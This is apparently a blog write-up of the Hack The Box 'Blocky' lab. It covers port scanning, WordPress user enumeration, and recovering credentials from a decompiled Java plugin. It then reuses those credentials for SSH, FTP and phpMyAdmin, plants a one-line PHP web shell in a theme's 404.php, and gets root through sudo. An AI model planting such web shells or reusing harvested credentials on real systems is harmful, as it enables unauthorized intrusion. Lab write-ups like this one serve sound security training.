Write-up of the Blocky machine from HTB
Today I’ll take a look at Blocky, where we will explore the easy-rated machine inspired by Minecraft.
Short Summary
- Nmap enumeration for open ports
- Directory busting for additional information
- Reversing a java
.Class - Password reuse, and multiple initial access paths
- Simple privilege escalation via
sudo -l
Enumeration
We run a port scan with the following command:
sudo nmap -p- -T4 --min-rate 2500 10.10.10.37and find the following ports open:
PORT STATE SERVICE REASON
21/tcp open ftp syn-ack ttl 63
22/tcp open ssh syn-ack ttl 63
80/tcp open http syn-ack ttl 63
8192/tcp closed sophos reset ttl 63
25565/tcp open minecraft syn-ack ttl 63Further enumeration of these ports gives us additional information:
PORT STATE SERVICE REASON VERSION
20/tcp filtered ftp-data no-response
21/tcp open ftp syn-ack ttl 63 ProFTPD 1.3.5a
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.18
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Did not follow redirect to http://blocky.htb
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
8192/tcp closed sophos reset ttl 63
25565/tcp open minecraft syn-ack ttl 63 Minecraft 1.11.2 (Protocol: 127, Message: A Minecraft Server, Users: 0/20)
Service Info: Host: 127.0.1.1; OS: Unix Since FTP is open we can try anonymous login.
Next on our list is port 80, or the HTTP server. Nmap already showed us that the hostname is blocky.htb, so we need to edit our /etc/hosts and add the following entry:
10.10.10.37 blocky.htbOnce we have done that, we can visit the website at http://blocky.htb.
At the bottom of the website, we see “Proudly powered by WordPress”. This hints that we should run wpscan. The following command was used for wpscan:
wpscan --url http://blocky.htb -e uThe goal was to enumerate users, and wpscan found a user named “notch”. We could have also found out about “notch” if we opened the post made on the website:
Once we have a username, we can try to brute-force the login page. Wpscan supports the brute-forcing option but found no valid password.
Since this is a website, we can try directory busting with Feroxbuser:
feroxbuster --url http://blocky.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -C 404 -n
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.9.1
───────────────────────────┬──────────────────────
🎯 Target Url │ http://blocky.htb
🚀 Threads │ 50
📖 Wordlist │ /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
💢 Status Code Filters │ [404]
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.9.1
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🏁 HTTP methods │ [GET]
🚫 Do Not Recurse │ true
🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404 GET -l 32w -c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200 GET 313l 3592w 52227c http://blocky.htb/
301 GET 9l 28w 307c http://blocky.htb/wiki => http://blocky.htb/wiki/
301 GET 9l 28w 313c http://blocky.htb/wp-content => http://blocky.htb/wp-content/
301 GET 9l 28w 310c http://blocky.htb/plugins => http://blocky.htb/plugins/
301 GET 9l 28w 314c http://blocky.htb/wp-includes => http://blocky.htb/wp-includes/
301 GET 9l 28w 313c http://blocky.htb/javascript => http://blocky.htb/javascript/
301 GET 9l 28w 311c http://blocky.htb/wp-admin => http://blocky.htb/wp-admin/
301 GET 9l 28w 313c http://blocky.htb/phpmyadmin => http://blocky.htb/phpmyadmin/
🚨 Caught ctrl+c 🚨 saving scan state to ferox-http_blocky_htb-1682175911.state ...
[####>---------------] - 1m 52973/220546 3m found:8 errors:0
[####>---------------] - 1m 52972/220546 814/s http://blocky.htb/ To explain the command:
- --url (or -u) is the URL of our target.
- -w is the path to our wordlist, in this case, 2.3-medium.txt.
- -C 404 filters out pages that return the HTTP status code 404.
- -n stops recursive brute forcing (actually missed a directory when I didn’t use this option).
We see a few directories, of which /wiki, /plugins, and /phpmyadmin contain juicy information.
When we take a look at the wiki page, we see mentions of a plugin.
Going to the plugins directory, we can find 2 .jar files. We can download those and decompile them to see if anything is interesting there.
Downloading and unzipping the BlockyCore.jar file, we see a BlockyCore.class file. We can look through the contents either via cat :
or we can use jd-gui to disassemble the file:
Well, we have a username and a password, let’s try to log in to FTP or SSH as the root user…yeah…no. We are not that lucky.
But, we had a user named “notch”, it’s always important to try all possible combinations.
Initial access
This machine offers a few ways to obtain a shell on the target system. I’ll go through each of them.
# First path
Since we have a user “notch” and a password, we can try to use those to log in via SSH.
# Second path
The second way is to access FTP as the same user with the same password. This won’t allow you to gain root as FTP itself doesn’t provide an interactive shell, but you can still obtain the user.txt.
A little tip, if accessing files via FTP, when downloading them you can add a
-to print the outputs directly to the shell. For example,get user.txt -will print the contents of user.txt.
# Third path
There still was /phpmyadmin that we never checked. The website asks us to log in, we can log in here with the root user. Once in, there exists a database containing the WordPress password for the “notch” user.
To exploit this, we first need to generate a new hash in the WordPress format. There are multiple ways to do this, I used this website. Having generated a hash, we can use change the one inside the database. Once changed, we can access WordPress as the “notch” user.
We can add our simple PHP payload inside the template:
<?php system($_GET['c']);?>After that, the file be located at /wp-content/themes/twentyseventeen/404.php, as shown in my previous blog (not associated with the CVE) this creates a web shell that will execute any command parsed via the “c” parameter.
Next, we would just execute a reverse shell and continue from there. Make sure to URL encode any command that has spaces or special characters.
Again bad OPSEC. Anyone can access this file, and as such, it seriously damages the company’s security. Don’t do this in real-life scenarios.
Privilege escalation
When you have a user’s password, it’s advised to always run sudo -l to check if we can run a command as root.
We simply run sudo su and gain a shell as root.
Conclusion
When hosting files, make sure there are no credentials in them. If credentials need to be in the file, at least don’t reuse the same password for multiple purposes. Password reuse (credential stuffing) is still in the OWASP Top 10.
If you have learned anything new or found the post helpful, consider giving the post a clap and following me for additional posts.
